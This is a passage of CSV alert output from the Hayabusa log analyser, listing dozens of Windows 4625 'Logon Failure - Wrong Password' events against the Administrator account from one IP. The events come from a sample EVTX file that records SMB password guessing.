Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k0w9SSWaaTX7chM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:36.961 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 46vgsyX5Wxn2rupf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.006 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PV8628a8GNKoFyzM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.047 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mksBFEFzkC08dB4o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.080 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U6QlHT6Bp63JDehd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.116 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tRj4fxcRY0Esegl6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.157 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dj6zQjZwGEBo0zNt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.202 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: imfY1T2VMoaqDSUd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.243 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qvPP8UYn9fLpRYl4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.289 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rFTGQ5tzNI5k58cK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.329 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8Zj3g1WiTLx8OlJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.364 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x2Lr6j8Qt4xEmZZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.409 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BeDRsguCovO47lKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.445 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KqrDyaFTewMPSzD9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.489 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nBVMAki1Ghpknf6p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.535 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXKhNUmBUQBTyeNM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.596 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d1g9TVwsweaBfZgE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.645 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kWymb6ucohaBB60b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.747 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LjL0zwlZofVuWhGC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.793 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nxsdzkJdnaZs5eKL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.844 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PR6EpKvbqMeoQlKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.889 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OZ3LMTtsVNI1gRO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.929 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75bNeXwYSZPhJdJ7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:37.981 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lH6TVXSqJb1qLd3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.021 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: edDWye6c2UhKznR6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.057 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AxKUl1lynGY1ectn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.094 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vI5yUgukPBVRorJI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.142 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmR29QcBKMGVQ8rB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.177 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7luV5GfiT0v0h7D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.217 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yA7pIDFgQbLIInqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.257 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 84g2gO0253Ut4O1O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.296 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DRkFX9WTAhBZ8jc8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.337 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WuoQAi4k3XZPaf4O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.393 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KjKMhCnbR0uFT0av | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.442 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1lfwqPB0AgTfIOt4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.486 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mJuG26pQzdjUQael | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.528 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GXwEziYTA3DkkFVq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.576 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CHr6dirvkT8B9ZVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.623 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B5eSMLiF4BsfY3xN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.657 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 64ISDuFRhR6cFYVQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.693 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hcprXytyuBw380XY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.733 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxfQWiSIhZYxwNjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.772 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FcL982boDelzeyzK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.817 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBAAjRdaR8U0tqt7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.857 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EmqUjcltAW6StHQJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.908 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 129Rp3HCmRVRXw3C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.945 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jpIIQP2oWEF51EBI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:38.975 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HREGh5ppEkLAuEob | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.022 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UVkpQvotEMfM8R0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.068 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dm6uHEy5RJJBJ6FG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.109 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HPTyAkYjcIlko5lu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.155 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OjlRoo9Sot4Fx4Th | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.205 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XslY26kw2aBw19D8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.242 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1404fakprYeqGiNY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.281 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y2VfIjtBcXCRlOjp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.317 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LPztyX4J9NV8EldT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.373 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 07flrrzWgsVBYaN2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.409 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vgkqkC1VvznGxR6N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.461 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hMn6yDMLgLChJTL6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.501 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uSTokOJ31Tj0bLXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.534 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyRifC46GrNpTA4x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.577 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CvNaby30vAT9drAX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.625 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wkYSOQ2bD51a4U8l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.669 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rqdOquL9Ax01RPPU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.705 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nqCCiK5arcyRHha6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.749 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TpyTGZLkAb0w0kgW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.789 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wa2pXrZKxeZZYKAq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:39.900 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dK0N5KeBgCze1YWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.029 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g4dHlwZjMzI5wU2s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.075 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GzF2ouP5KkRfsxnf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.109 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RSQxMrGlDiAOo6ri | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.148 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gL0rz3p1yG6RhfAT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.196 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyChoTSKgJeK6yqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.234 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tG4I11dwpBM9SM3l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.276 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7foAZ5Y1igCbHap | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.327 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ATDXUljQwg8WvUVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.373 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdmXaJqQMAG2g6Ao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.413 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bjame5puT5CDeoIG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:40.454 